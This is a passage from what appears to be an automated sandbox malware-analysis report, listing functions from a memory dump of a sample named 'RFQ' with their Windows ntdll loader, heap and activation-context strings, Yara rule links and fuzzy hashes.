                                                                                                        • Opcode Fuzzy Hash: 28114a089deff72493fff00f3ee4f434cd388d0d88f3f49a8f1a4b74cd5cf642
                                                                                                        • Instruction Fuzzy Hash: ECC167752083929FDB11CF68C144B6AB7F4AFC4704F08896AF9D6CB291E734CA49CB56
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A68402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • LdrpInitializeProcess, xrefs: 01A68422
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01A68421
                                                                                                        • @, xrefs: 01A68591
                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A6855E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1918872054
                                                                                                        • Opcode ID: ee2e6dcdb14735160690647395b7f64f4e9ba56fe49f138f41da083b5decd88d
                                                                                                        • Instruction ID: da7611eec3579533b31288e01feab1b508ce93eacc20f566b11ebefdb6378eb0
                                                                                                        • Opcode Fuzzy Hash: ee2e6dcdb14735160690647395b7f64f4e9ba56fe49f138f41da083b5decd88d
                                                                                                        • Instruction Fuzzy Hash: A3917971548345AFD722EF65CD40FBBBAECFB84744F40092EFA8492151E738DA448B66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01AA21DE
                                                                                                        • .Local, xrefs: 01A628D8
                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01AA21D9, 01AA22B1
                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01AA22B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                        • API String ID: 0-1239276146
                                                                                                        • Opcode ID: a8a74fdf3bd1e9156289fe5ea54e2237979dfb3cf217ca3affd5500a5c694bbe
                                                                                                        • Instruction ID: 1d45a2815098085b930fb9f39d78abe5b8768f856118d509ce1d22b0b71cef18
                                                                                                        • Opcode Fuzzy Hash: a8a74fdf3bd1e9156289fe5ea54e2237979dfb3cf217ca3affd5500a5c694bbe
                                                                                                        • Instruction Fuzzy Hash: F0A19F3294022A9BDB35CF68DC84BA9B7B5BF98354F1441EAD948E7251D7309E84CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A64AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01AA3456
                                                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01AA3437
                                                                                                        • RtlDeactivateActivationContext, xrefs: 01AA3425, 01AA3432, 01AA3451
                                                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01AA342A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                        • API String ID: 0-1245972979
                                                                                                        • Opcode ID: 8bda40525fe865aa9466e255420d66f1c575e1b9cdd7ea0b567036d1ad6f2306
                                                                                                        • Instruction ID: db46289833a58dd7259531513573e10c44749d11cbd7d672d6960dcb118b618c
                                                                                                        • Opcode Fuzzy Hash: 8bda40525fe865aa9466e255420d66f1c575e1b9cdd7ea0b567036d1ad6f2306
                                                                                                        • Instruction Fuzzy Hash: FA610476600712AFDB22CF1DC841B3AB7E9FF94B51F588529E9559B282CB30E801CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A910AE
                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A91028
                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A90FE5
                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A9106B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                        • API String ID: 0-1468400865
                                                                                                        • Opcode ID: ba0d9b4d662cf4e229d6fc6e2d1ff92779239256acf91038df05d4cc09acfb45
                                                                                                        • Instruction ID: 6ec71d3565993c9f2f46e1bf3daa7a4737c93dc2390cda600a4082d0e141ecd9
                                                                                                        • Opcode Fuzzy Hash: ba0d9b4d662cf4e229d6fc6e2d1ff92779239256acf91038df05d4cc09acfb45
                                                                                                        • Instruction Fuzzy Hash: B471E1B1904345AFCB21DF28C984B9B7FA8AF94764F440469F9488B186D734D688CBD2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A5245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01A9A9A2
                                                                                                        • LdrpDynamicShimModule, xrefs: 01A9A998
                                                                                                        • apphelp.dll, xrefs: 01A52462
                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A9A992
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-176724104
                                                                                                        • Opcode ID: 52cbf12065bece81345f0902995dd78b6b966f37409ada69e4b2d8e922cdb7cc
                                                                                                        • Instruction ID: 824344c0b1fa3158aed05e3a9bf01262eef260c43824388fa2109e7b80681fdd
                                                                                                        • Opcode Fuzzy Hash: 52cbf12065bece81345f0902995dd78b6b966f37409ada69e4b2d8e922cdb7cc
                                                                                                        • Instruction Fuzzy Hash: 4F313776A00201EBDF319F5DD981F6A7BF5FB84B04F25001BED05AB269C7B49985C780
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • HEAP[%wZ]: , xrefs: 01A43255
                                                                                                        • HEAP: , xrefs: 01A43264
                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A4327D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                        • API String ID: 0-617086771
                                                                                                        • Opcode ID: 6b4fa3d8232fba6996899fb1e919e2c3884b1cc9e334fb29e5fa322d5cf13447
                                                                                                        • Instruction ID: dcf20bc4be692f8c7011faf14d240ff514220d44029bd39161bfe6c16798833e
                                                                                                        • Opcode Fuzzy Hash: 6b4fa3d8232fba6996899fb1e919e2c3884b1cc9e334fb29e5fa322d5cf13447
                                                                                                        • Instruction Fuzzy Hash: D492CE70A042599FDF25CF68D4447AEBBF1FF88300F1880AAE999AB391D734A945CF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-4253913091
                                                                                                        • Opcode ID: 0ed3e020d545d5dd72ca8c388625c38f361d481dfe0e015d1f8ab905cf677a91
                                                                                                        • Instruction ID: 71e9e78cdaeea47a09f9d2e812ed06b2424067f064fb98be3a7df31930d98738
                                                                                                        • Opcode Fuzzy Hash: 0ed3e020d545d5dd72ca8c388625c38f361d481dfe0e015d1f8ab905cf677a91
                                                                                                        • Instruction Fuzzy Hash: 84F1B074A00605DFEB16CF68CA84BAAB7F5FF84300F1441A9E616DB342D734E981DB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A56962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@
                                                                                                        • API String ID: 0-1077428164
                                                                                                        • Opcode ID: b5301a058eee6038f8caf0acae336ca2e6df63e2c1af239185d4ae5cf334d37c
                                                                                                        • Instruction ID: 17ddfbebc7ad5436aa917ebb760bf17c987d96dbabdcd467bcfbb7bcc4c42d1f
                                                                                                        • Opcode Fuzzy Hash: b5301a058eee6038f8caf0acae336ca2e6df63e2c1af239185d4ae5cf334d37c
                                                                                                        • Instruction Fuzzy Hash: E0C2AD7160C7419FEB65CF68C880BABBBE5AF88314F48892DED89D7241D734D844CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                        • API String ID: 0-2779062949
                                                                                                        • Opcode ID: 0d60cd83b1b492b5333b39450ab4ca4ec76434afb785c09027fb998f9204e1ff
                                                                                                        • Instruction ID: 8ad179a6bd386a380ad66a1112e8b7453ac66b1d4e661661a8a9d1fe24843efa
                                                                                                        • Opcode Fuzzy Hash: 0d60cd83b1b492b5333b39450ab4ca4ec76434afb785c09027fb998f9204e1ff
                                                                                                        • Instruction Fuzzy Hash: 99A15B719116299BDB31EF68CD88BEAB7B8EF44710F1001EAE909A7250D7359F85CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A50BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01A9A121
                                                                                                        • LdrpCheckModule, xrefs: 01A9A117
                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 01A9A10F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-161242083
                                                                                                        • Opcode ID: 375baa7754851f96715ec75ae9facfc1cab13435529160c1dc29cc6e6d23eee7
                                                                                                        • Instruction ID: 380fc64120b3f4e23bc13755fcc6e9eb0ec555c72befd0dad460ea1eaa123b60
                                                                                                        • Opcode Fuzzy Hash: 375baa7754851f96715ec75ae9facfc1cab13435529160c1dc29cc6e6d23eee7
                                                                                                        • Instruction Fuzzy Hash: 0271C071A002059FDF25DF68CA85ABEB7F4FB84304F18442EE906DB255E734AD85CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A6C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AA82E8
                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 01AA82D7
                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 01AA82DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1783798831
                                                                                                        • Opcode ID: 265cb9a30fb13abab5f61134e3f3c97067af3b98d33c4c46c05e36120987c8a6
                                                                                                        • Instruction ID: 626858bb873e1b8b2af187859a4d71467e9e50a228062d5ab48c2313f46fe8c5
                                                                                                        • Opcode Fuzzy Hash: 265cb9a30fb13abab5f61134e3f3c97067af3b98d33c4c46c05e36120987c8a6
                                                                                                        • Instruction Fuzzy Hash: AE41E271944311ABC731EF68D944BAB77E8FF48760F04492AFA88D3254E778D8048B91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • PreferredUILanguages, xrefs: 01AEC212
                                                                                                        • @, xrefs: 01AEC1F1
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01AEC1C5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                        • API String ID: 0-2968386058
                                                                                                        • Opcode ID: c153d230e4d3d07b20d08c4352a3b8de475fad25fd51a265568c93376d19eda5
                                                                                                        • Instruction ID: f0ac47ebac7577f17702a87f57eb087198e37361dc193da7ba0220a71d4a88af
                                                                                                        • Opcode Fuzzy Hash: c153d230e4d3d07b20d08c4352a3b8de475fad25fd51a265568c93376d19eda5
                                                                                                        • Instruction Fuzzy Hash: 03417372E00219EBDF11EBD8C955FEEBBF8AB54710F14406AE609B7244D7749A44CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                        • API String ID: 0-1373925480
                                                                                                        • Opcode ID: 5cadda57284034f85dfaa0761e27b6ddc5ce6331f20e7d14d254ad062112c891
                                                                                                        • Instruction ID: 3350d0e964f2a0d7a3743ab5736f4994823c710de042761e31ad986a3aa44781
                                                                                                        • Opcode Fuzzy Hash: 5cadda57284034f85dfaa0761e27b6ddc5ce6331f20e7d14d254ad062112c891
                                                                                                        • Instruction Fuzzy Hash: EA412671A04758CBEB26DBE8C950BADBBB9FFA9B40F18045DD941EB381D7348901CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • LdrpCheckRedirection, xrefs: 01AB488F
                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01AB4888
                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01AB4899
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                        • API String ID: 0-3154609507
                                                                                                        • Opcode ID: d7d9715ac0a5ba08e088d2568d43da80bc33b60810df892e9732c2c00aeaa38c
                                                                                                        • Instruction ID: 05ebba76fc67ebc7d262617ecbc88214761248ba9f3f64ea7ad871e8c40d8db7
                                                                                                        • Opcode Fuzzy Hash: d7d9715ac0a5ba08e088d2568d43da80bc33b60810df892e9732c2c00aeaa38c
                                                                                                        • Instruction Fuzzy Hash: 4641B272A046D19BCB22CFADD980AA67BECBF4D650F050559ED8A97253D730E840CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A40BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-2558761708
                                                                                                        • Opcode ID: bcf2c27218375d35ec61fa7a96944155aea1a061263f650208ed0f5749e5b970
                                                                                                        • Instruction ID: bc5a8381cf8878a3e1dd95a4c02dd1d0002202420bdfd71dce18c04f6f07c341
                                                                                                        • Opcode Fuzzy Hash: bcf2c27218375d35ec61fa7a96944155aea1a061263f650208ed0f5749e5b970
                                                                                                        • Instruction Fuzzy Hash: AA11DF317151429FDB6ACB28C542BA6B3E6EFC0715F18812AF606CB252DB30D881D755
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01AB2104
                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 01AB20F3
                                                                                                        • LdrpInitializationFailure, xrefs: 01AB20FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2986994758
                                                                                                        • Opcode ID: 233069fe2c4a4f5fd67c424fd00ce9361d8600abcf2c0eeb685c69a049c9fbcc
                                                                                                        • Instruction ID: 91c7b2f1590633f29c28df576ef8a5042a32d7c12d43703bef9e993f2c18f828
                                                                                                        • Opcode Fuzzy Hash: 233069fe2c4a4f5fd67c424fd00ce9361d8600abcf2c0eeb685c69a049c9fbcc
                                                                                                        • Instruction Fuzzy Hash: 71F0C835640348BBE734EB4CED52FD9376CFB44B54F14046AFA0067696D2B0A504C651
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: #%u
                                                                                                        • API String ID: 48624451-232158463
                                                                                                        • Opcode ID: f5741876551097ee8ae40ba1e071160f27753c48ee418792b55eca9c02b98e37
                                                                                                        • Instruction ID: 678443abeb2ac5d7e3a289d910f40a589b0b37f849a4df16aeb5fd7dc7ab9f8d
                                                                                                        • Opcode Fuzzy Hash: f5741876551097ee8ae40ba1e071160f27753c48ee418792b55eca9c02b98e37
                                                                                                        • Instruction Fuzzy Hash: 4C713871A0014A9FDF15DFA8CA90BAEB7F8BF48704F144065E905E7252EA34EE45CB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A3A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • LdrResSearchResource Exit, xrefs: 01A3AA25
                                                                                                        • LdrResSearchResource Enter, xrefs: 01A3AA13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                        • API String ID: 0-4066393604
                                                                                                        • Opcode ID: 60c62abfa36ae786f2dfe155f8c04d57351908ab70935a00bef2b415933882dc
                                                                                                        • Instruction ID: b65dee68c30d2904e250557c799bc9bec8c7f7db14ee36598a95dc5080d63f55
                                                                                                        • Opcode Fuzzy Hash: 60c62abfa36ae786f2dfe155f8c04d57351908ab70935a00bef2b415933882dc
                                                                                                        • Instruction Fuzzy Hash: 29E16371E00229AFEF26CFA9C984BAEBBB9FF84310F144526F941E7251D7749981CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `$`
                                                                                                        • API String ID: 0-197956300
                                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                        • Instruction ID: 74827e55aab53ecb4ae2cd930923e6c79169fb079cffc9e0926fb9390439a6ca
                                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                        • Instruction Fuzzy Hash: 8BC1C0312043429BE725CFA8C944BABBBE5AFC4358F084A2DF69ACB291D774D505CB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Legacy$UEFI
                                                                                                        • API String ID: 2994545307-634100481
                                                                                                        • Opcode ID: a6461648881eb5972f60c442a3a0b1dd28329d60b00799d95204791597a127a9
                                                                                                        • Instruction ID: 410eac7efc05158c32e3a3148a8634167e126a881c5f465fdbc388cfec81d3fd
                                                                                                        • Opcode Fuzzy Hash: a6461648881eb5972f60c442a3a0b1dd28329d60b00799d95204791597a127a9
                                                                                                        • Instruction Fuzzy Hash: 86614CB1E003199FDB15DFA9C980BAEBBB5FB48700F54406EE659EB291D731AD00CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01AD43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$MUI
                                                                                                        • API String ID: 0-17815947
                                                                                                        • Opcode ID: 715526df6c4769c2bf31768fda5a5d32187ecbd88ba443da878b0c781f905304
                                                                                                        • Instruction ID: 2a0e6884a5cbe3399d23a2ed068cc035d92e108372babec5e4120e8c66ed8bbb
                                                                                                        • Opcode Fuzzy Hash: 715526df6c4769c2bf31768fda5a5d32187ecbd88ba443da878b0c781f905304
                                                                                                        • Instruction Fuzzy Hash: 0E5118B1D0061DAFEF11DFA9CD90BEEBBB8EB48754F10052AE611B7690D6309E45CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01A304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • kLsE, xrefs: 01A30540
                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A3063D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_1a00000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
